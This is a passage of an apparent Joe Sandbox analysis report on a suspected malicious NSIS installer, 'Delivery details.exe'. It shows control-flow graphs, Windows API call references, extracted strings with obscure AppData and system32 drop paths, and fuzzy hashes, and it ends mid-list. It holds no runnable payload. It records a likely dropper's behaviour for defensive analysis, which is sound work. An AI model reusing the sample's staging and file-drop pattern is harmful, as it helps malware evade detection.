                                                                  control_flow_graph 369 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 372 402f64-402f69 369->372 373 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 369->373 374 4031b3-4031b7 372->374 381 402fa2-402fb9 373->381 382 40308c-40309a call 402e72 373->382 384 402fbb 381->384 385 402fbd-402fca call 40342b 381->385 388 4030a0-4030a3 382->388 389 40316b-403170 382->389 384->385 391 402fd0-402fd6 385->391 392 403127-40312f call 402e72 385->392 393 4030a5-4030bd call 403441 call 40342b 388->393 394 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 388->394 389->374 395 403056-40305a 391->395 396 402fd8-402ff0 call 405e5d 391->396 392->389 393->389 421 4030c3-4030c9 393->421 419 403131-403161 call 403441 call 4031ba 394->419 420 40311d-403122 394->420 404 403063-403069 395->404 405 40305c-403062 call 402e72 395->405 396->404 414 402ff2-402ff9 396->414 406 40306b-403079 call 40687d 404->406 407 40307c-403086 404->407 405->404 406->407 407->381 407->382 414->404 418 402ffb-403002 414->418 418->404 422 403004-40300b 418->422 429 403166-403169 419->429 420->374 421->389 421->394 422->404 424 40300d-403014 422->424 424->404 426 403016-403036 424->426 426->389 428 40303c-403040 426->428 430 403042-403046 428->430 431 403048-403050 428->431 429->389 432 403172-403183 429->432 430->382 430->431 431->404 435 403052-403054 431->435 433 403185 432->433 434 40318b-403190 432->434 433->434 436 403191-403197 434->436 435->404 436->436 437 403199-4031b1 call 405e5d 436->437 437->374
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402F28
                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F44
                                                                    • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
                                                                    • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00402F8D
                                                                  • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00402F64
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F21, 004030EC
                                                                  • soft, xrefs: 00403004
                                                                  • "C:\Users\user\Desktop\Delivery details.exe", xrefs: 00402F14
                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311D
                                                                  • !Y, xrefs: 0040315C
                                                                  • C:\Users\user\Desktop, xrefs: 00402F6F, 00402F74, 00402F7A
                                                                  • Null, xrefs: 0040300D
                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040316B
                                                                  • Inst, xrefs: 00402FFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: !Y$"C:\Users\user\Desktop\Delivery details.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                  • API String ID: 2803837635-2103261263
                                                                  • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                  • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                                  • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                  • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 440 4063d2-4063dd 441 4063f0-406406 440->441 442 4063df-4063ee 440->442 443 40640c-406419 441->443 444 40661e-406624 441->444 442->441 443->444 447 40641f-406426 443->447 445 40662a-406635 444->445 446 40642b-406438 444->446 448 406640-406641 445->448 449 406637-40663b call 4063b0 445->449 446->445 450 40643e-40644a 446->450 447->444 449->448 451 406450-40648e 450->451 452 40660b 450->452 454 406494-40649f 451->454 455 4065ae-4065b2 451->455 456 406619-40661c 452->456 457 40660d-406617 452->457 458 4064a1-4064a6 454->458 459 4064b8 454->459 460 4065b4-4065ba 455->460 461 4065e5-4065e9 455->461 456->444 457->444 458->459 462 4064a8-4064ab 458->462 465 4064bf-4064c6 459->465 463 4065ca-4065d6 call 4063b0 460->463 464 4065bc-4065c8 call 4062f7 460->464 466 4065f8-406609 lstrlenW 461->466 467 4065eb-4065f3 call 4063d2 461->467 462->459 468 4064ad-4064b0 462->468 478 4065db-4065e1 463->478 464->478 470 4064c8-4064ca 465->470 471 4064cb-4064cd 465->471 466->444 467->466 468->459 474 4064b2-4064b6 468->474 470->471 476 406508-40650b 471->476 477 4064cf-4064f6 call 40627e 471->477 474->465 479 40651b-40651e 476->479 480 40650d-406519 GetSystemDirectoryW 476->480 490 406596-406599 477->490 491 4064fc-406503 call 4063d2 477->491 478->466 482 4065e3 478->482 484 406520-40652e GetWindowsDirectoryW 479->484 485 406589-40658b 479->485 483 40658d-406591 480->483 487 4065a6-4065ac call 406644 482->487 483->487 492 406593 483->492 484->485 485->483 489 406530-40653a 485->489 487->466 495 406554-40656a SHGetSpecialFolderLocation 489->495 496 40653c-40653f 489->496 490->487 493 40659b-4065a1 lstrcatW 490->493 491->483 492->490 493->487 499 406585 495->499 500 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 495->500 496->495 498 406541-406548 496->498 502 406550-406552 498->502 499->485 500->483 500->499 502->483 502->495
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406513
                                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,driftsresultaters,?,0040544B,driftsresultaters,00000000), ref: 00406526
                                                                  • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,driftsresultaters,?,0040544B,driftsresultaters,00000000), ref: 00406562
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406570
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                  • lstrlenW.KERNEL32(: Completed,00000000,driftsresultaters,?,0040544B,driftsresultaters,00000000), ref: 004065F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$driftsresultaters
                                                                  • API String ID: 717251189-3938885532
                                                                  • Opcode ID: a7e104a29e5f19cfde2f3cfc709b359522486d94b69a74c72ff4b660ab3b6ac0
                                                                  • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                  • Opcode Fuzzy Hash: a7e104a29e5f19cfde2f3cfc709b359522486d94b69a74c72ff4b660ab3b6ac0
                                                                  • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 567 40176f-401794 call 402c37 call 405cf8 572 401796-40179c call 4063b0 567->572 573 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 567->573 578 4017b5-4017b6 call 406644 572->578 573->578 582 4017bb-4017bf 578->582 583 4017c1-4017cb call 4066f3 582->583 584 4017f2-4017f5 582->584 591 4017dd-4017ef 583->591 592 4017cd-4017db CompareFileTime 583->592 585 4017f7-4017f8 call 405e7d 584->585 586 4017fd-401819 call 405ea2 584->586 585->586 594 40181b-40181e 586->594 595 40188d-4018b6 call 405414 call 4031ba 586->595 591->584 592->591 596 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 594->596 597 40186f-401879 call 405414 594->597 607 4018b8-4018bc 595->607 608 4018be-4018ca SetFileTime 595->608 596->582 629 401864-401865 596->629 609 401882-401888 597->609 607->608 611 4018d0-4018db FindCloseChangeNotification 607->611 608->611 612 402ac8 609->612 615 4018e1-4018e4 611->615 616 402abf-402ac2 611->616 617 402aca-402ace 612->617 619 4018e6-4018f7 call 4063d2 lstrcatW 615->619 620 4018f9-4018fc call 4063d2 615->620 616->612 626 401901-4022f6 call 405a12 619->626 620->626 626->616 626->617 629->609 631 401867-401868 629->631 631->597
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                  • CompareFileTime.KERNEL32(-00000014,?,288,288,00000000,00000000,288,C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured,?,?,00000031), ref: 004017D5
                                                                    • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                    • Part of subcall function 00405414: lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                    • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                    • Part of subcall function 00405414: lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
                                                                    • Part of subcall function 00405414: SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: 288$C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured$C:\Windows\system32\trommede.Bov
                                                                  • API String ID: 1941528284-3050871814
                                                                  • Opcode ID: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
                                                                  • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                  • Opcode Fuzzy Hash: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
                                                                  • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 633 405414-405429 634 4054e0-4054e4 633->634 635 40542f-405440 633->635 636 405442-405446 call 4063d2 635->636 637 40544b-405457 lstrlenW 635->637 636->637 639 405474-405478 637->639 640 405459-405469 lstrlenW 637->640 642 405487-40548b 639->642 643 40547a-405481 SetWindowTextW 639->643 640->634 641 40546b-40546f lstrcatW 640->641 641->639 644 4054d1-4054d3 642->644 645 40548d-4054cf SendMessageW * 3 642->645 643->642 644->634 646 4054d5-4054d8 644->646 645->644 646->634
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                  • lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                  • lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
                                                                  • SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: driftsresultaters
                                                                  • API String ID: 2531174081-1118024360
                                                                  • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                  • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                                  • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                  • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401DB6
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                  • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID: Times New Roman
                                                                  • API String ID: 3808545654-927190056
                                                                  • Opcode ID: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
                                                                  • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                                  • Opcode Fuzzy Hash: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
                                                                  • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 661 40671a-40673a GetSystemDirectoryW 662 40673c 661->662 663 40673e-406740 661->663 662->663 664 406751-406753 663->664 665 406742-40674b 663->665 667 406754-406787 wsprintfW LoadLibraryExW 664->667 665->664 666 40674d-40674f 665->666 666->667
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                  • wsprintfW.USER32 ref: 0040676C
                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-1946221925
                                                                  • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                  • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                                  • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                  • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 668 405ed1-405edd 669 405ede-405f12 GetTickCount GetTempFileNameW 668->669 670 405f21-405f23 669->670 671 405f14-405f16 669->671 673 405f1b-405f1e 670->673 671->669 672 405f18 671->672 672->673
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405EEF
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Delivery details.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5), ref: 00405F0A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\Delivery details.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-3995105316
                                                                  • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                  • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                                  • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                  • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 674 4032c2-4032ea GetTickCount 675 4032f0-40331b call 403441 SetFilePointer 674->675 676 40341a-403422 call 402e72 674->676 682 403320-403332 675->682 681 403424-403428 676->681 683 403334 682->683 684 403336-403344 call 40342b 682->684 683->684 687 40334a-403356 684->687 688 40340c-40340f 684->688 689 40335c-403362 687->689 688->681 690 403364-40336a 689->690 691 40338d-4033a9 call 40690b 689->691 690->691 692 40336c-40338c call 402e72 690->692 696 403415 691->696 697 4033ab-4033b3 691->697 692->691 701 403417-403418 696->701 699 4033b5-4033bd call 405f54 697->699 700 4033d6-4033dc 697->700 704 4033c2-4033c4 699->704 700->696 703 4033de-4033e0 700->703 701->681 703->696 705 4033e2-4033f5 703->705 706 403411-403413 704->706 707 4033c6-4033d2 704->707 705->682 708 4033fb-40340a SetFilePointer 705->708 706->701 707->689 709 4033d4 707->709 708->676 709->705
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004032D6
                                                                    • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                                  • SetFilePointer.KERNELBASE(003472C5,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
